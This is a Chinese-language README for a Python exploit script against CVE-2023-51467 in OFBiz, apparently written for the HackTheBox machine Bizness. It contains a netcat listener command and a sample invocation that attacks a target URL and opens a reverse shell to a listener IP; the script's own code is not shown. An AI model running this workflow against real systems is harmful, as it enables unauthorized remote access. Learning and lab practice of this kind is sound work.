
针对 Java Web 框架 OF Biz 在 CVE-2023-51467 下的自动利用脚本。灵感来源于 HackTheBox 机器 Bizness。
此脚本需要工具 ysoserial 和 OpenJDK 11 版本。请参阅使用菜单进行安装。
使用你偏好的方法设置监听器以捕获 shell。以下是一个 netcat 示例:
nc -nlvp 1337
执行脚本:
python3 badbizness.py [ysoserial-all.jar 的路径] [目标基础 URL] [监听 IP] [监听端口]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
此工具旨在作为学习 Python 的一种方式。我感谢此脚本对我的深入帮助。